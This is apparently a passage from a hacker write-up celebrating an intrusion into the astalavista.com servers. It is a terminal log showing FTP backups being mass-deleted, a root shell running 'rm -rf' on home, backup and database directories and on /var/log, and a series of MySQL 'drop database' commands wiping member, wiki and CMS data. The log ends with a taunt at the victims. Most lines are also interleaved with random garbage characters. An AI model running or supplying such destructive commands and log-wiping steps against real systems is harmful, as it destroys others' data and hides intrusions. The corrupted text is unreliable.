6 W: A- |( X; h/ `: M/ ^-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
) h5 f g, J. c' s& I/ Y-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz28 C. U# F2 i& i5 W- D5 ~- H$ F
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar) A$ ]4 }9 f" r5 G s* J' @
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
R7 Q1 T% A& Y! @[snip]: h0 F) w! Q3 j0 _
226 Transfer complete.
; V1 K1 I! H7 U, N: k& v. n2 Jftp> mdelete *
2 g5 _# B1 s, U8 w. z8 Qftp> ls -la9 X3 G% x" Z6 l9 {
227 Entering Passive Mode (212,254,194,163,2,193)
# B! ^0 W; C$ C3 t1 m1 Y2 |% O+ }0 w150 Opening BINARY mode data connection for ‘file list’.
1 M$ n6 S' v6 [5 M+ X226 Transfer complete.0 A' N( b. }! H" w2 w& q
ftp>
8 G, e+ Y: t! ~: b* H% y8 ]; p& Q* |! a# O! F, k6 x
sh-3.2# cd /home
1 F) N( Q# n. h0 f3 N+ Rsh-3.2# ls -la
' u! w" ?# ^& P2 @total 120) _+ G1 R1 o4 P$ b
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
5 d7 s6 L% |1 U/ adrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
) j; I! @( L' s4 J; |drwx–x–x 9 admin admin 4096 Nov 28 2007 admin+ X# H* v F; W5 F7 z' ?
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group" @/ N, r0 P( l, C8 ` r7 \/ D6 h; T
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
9 N* d9 e3 a7 ]: c% cdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet& M; e5 Q+ W* X! S- A
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
' P9 D; w& e# T& @* G* ?drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
* `7 [5 W* a1 l8 K& _drwx–x–x 10 com com 4096 Apr 28 12:40 com- P @$ u. [0 s
drwxr-xr-x 2 root root 4096 May 17 2007 ftp" G5 ^; s5 k$ O. |1 c6 u0 j
drwx—— 3 jon jon 4096 Sep 21 2007 jon! B* S) L* ~* j& Z7 I
drwx—— 2 root root 16384 Sep 11 2007 lost+found
% d8 M0 d$ L1 B @8 ]+ M# fdrwxr-xr-x 2 root root 4096 Sep 14 2007 my
8 t1 T0 _9 U! p' J, Q! Bdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata6 r$ N- H. Q" C' q: O" C
drwx—— 2 jon jon 4096 Sep 15 2007 test
, a; S) }: X) Wdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp1 `# N0 l0 H0 v. }2 w3 w7 u
+ U* e8 E9 s T4 C* lsh-3.2# rm -rf backup/
$ m6 E; P! D2 w& d- Y+ C0 r% Ash-3.2# rm -rf backup.14161/. E$ e) Z V5 j9 j( Z
sh-3.2# rm -rf ftp/+ F5 a H! z" w; h) f$ V' p
sh-3.2# rm -rf jon/
7 E5 Q* i# j, U6 ^ Psh-3.2# rm -rf my/
% w: }) N0 C/ d+ g$ |8 @sh-3.2# rm -rf mysqldata/# D2 n0 n3 V7 ^8 Q7 a! w
sh-3.2# rm -rf test/, O% M( |2 {3 H( c+ q
sh-3.2# rm -rf tmp/
# F# z# r# n6 ^ R4 N3 i# esh-3.2# cd ~+ Y/ f. j# q2 R% _2 l% u* h
sh-3.2# rm -rf *
& _6 E! l; U" [, h- gsh-3.2# rm -rf /var/log/
; `: Y5 M7 o; B7 D( Lrm: cannot remove directory `/var/log//proftpd’: Directory not empty
7 G. D' M8 {" f+ M8 Y! `/ osh-3.2# rm -rf /home/*
. X6 }# e! j; q& Qsh-3.2# mysql
3 O/ F {' c3 M2 q" m& QWelcome to the MySQL monitor. Commands end with ; or \g.
5 q$ ^. ^! J6 SYour MySQL connection id is 4071562 ~ U ]2 e# G4 f/ {! e
Server version: 5.0.45-community-log MySQL Community Edition (GPL)( X0 k6 _+ n; k: Y' ?/ M
" ]2 E# U, C* @0 ^7 T2 I
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
, Q" _ I) N4 a4 j) |( _
5 D% C1 ~% s( }7 i" Qmysql> show databases;$ ~* S1 S1 X M$ F6 l9 ]7 Q
+———————–+
8 B) V, F. h- l2 o. D| Database |
- Z" S' I! g7 b" t( }! _+———————–+2 C2 d/ Y! {1 F# Y5 e' M" e
| information_schema |8 \7 [' j* W/ v" [+ F
| astanet_ads |: e3 q& _& {6 h- _( c/ f# ?( B" d
| astanet_mailing_lists |
$ L* l( C; k4 V! I0 z* G6 C| astanet_mediawiki |- W" a. x# d( T9 r }
| astanet_membersystem |# X9 t* Z9 a! a* o
| com_contrexx |
( n" {9 n8 q$ V# b. C' B, ~0 r| com_contrexx2 |/ X/ k, ]& q$ Y% T% B" d0 @; ?
| com_contrexx2_live |
/ e5 m6 i, R4 _( g% O| da_roundcube |4 X, M! I# }/ E4 @9 J' q
| dolphin |& q. {$ o: w, |- X" l/ Q9 h! _
| ideapool |
) V% D) { w$ l/ l' R4 x- m| mysql |2 j# n$ I$ e9 a# p' x: A" i
| test |: a7 k0 z5 m0 d' g
| yourmaster |
( E+ y' S7 x) [% A+———————–+/ t$ j ^) E' n( }4 @7 G' k+ u3 ^
14 rows in set (0.03 sec) H5 }4 O( `* L4 i5 i! m! J
6 C: k% ~& m' O1 A* J K, S" ~) ]
mysql> drop database astanet_membersystem;
% H* Y& c& ?; jdroQuery OK, 46 rows affected (0.81 sec)8 ]* s/ V& Z; T( y( F
& \' _& L% ` r+ C
mysql> drop database com_contrexx;" v( h! E" o/ b% c8 T2 e
Query OK, 211 rows affected (2.72 sec)- o' w; @) o4 M, l1 \2 ]& g! F4 z2 C
8 l% \- U* _6 l6 W- C6 _# u9 r
mysql> drop database com_contrexx2;
F0 M. H- ]6 m5 O( C0 [6 gQuery OK, 237 rows affected (2.23 sec)- f0 K8 h% d/ b0 P4 Z
$ {! t. p9 ~& O! L, s8 \% d8 Z3 P- B
mysql> drop database com_contrexx2_live;3 U5 F9 q3 B) v" ^5 R& g5 E9 x
Query OK, 227 rows affected (7.63 sec)
6 Q' l/ q# T. V7 F, _; o- L+ M& M+ E, T2 {, b$ X. i' y/ T
mysql> drop database ideapool;$ q# k1 L, y" X! p& l2 T* F
Query OK, 69 rows affected (0.19 sec)/ m( h Q/ l2 V. E* s6 I; k
$ h/ w, L: _. q0 s$ x- z" ~mysql> drop database yourmaster;+ o* e2 n- C) X$ S. e
Query OK, 158 rows affected (0.55 sec)
7 c4 K' |" O$ Y$ t9 D: y: B* C
8 g* i$ a9 G8 Dmysql> drop database astanet_ads;$ Z$ X* ^/ s' a" b
Query OK, 9 rows affected (0.11 sec)
2 n6 \3 l( K- d- L# t, k& j" D0 q) g0 _8 A1 l# R! Y5 O7 ?* | i0 A
mysql> drop database astanet_mailing_lists;
/ O' F4 ]6 ^% U: a( @Query OK, 24 rows affected (1.47 sec)- P1 x. N3 R* K; ?2 X
+ ?& y& `$ o. D* i; B
mysql> drop database astanet_mediawiki;! P: t6 \ F$ J D( G4 R5 ]$ P
Query OK, 31 rows affected (0.51 sec)
( F7 m9 f0 Q6 Z" z* \9 k3 c6 N% e7 S* s* J% i5 C" e; A" ^4 ~
mysql> show databases;
R4 ?, l8 r; b# K5 B" J+——————–+& B( j! W0 I/ R. c) `
| Database |5 }4 M! P" w& }3 U% z
+——————–+
& e. T% I: q$ Q- d9 n0 R. H| information_schema |
" l- Z ^( ?% h| da_roundcube |
1 ~0 A B3 I# d$ x3 Y5 r| dolphin |1 C' M( o3 t6 C- ?: B
| mysql |! w( W# q7 a% u. y7 p, ^2 \
| test |" `& g; ~( I- @. O5 {
+——————–+4 E9 x! N4 V/ t
5 rows in set (0.00 sec)
) ?8 P( p! s4 ~8 B& J) M( ^; L" a0 Y/ ?# K* w2 A7 [* E, V
What a journey! We’re not sure exactly why the “Terminator” had any influence on9 j5 \; D, \" T3 z; p6 i# j3 r- H
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the6 `0 p" s, n2 m: r& u
wrong to say this pack of morons *wont be back*.- g: I. d8 s" B5 Q b
|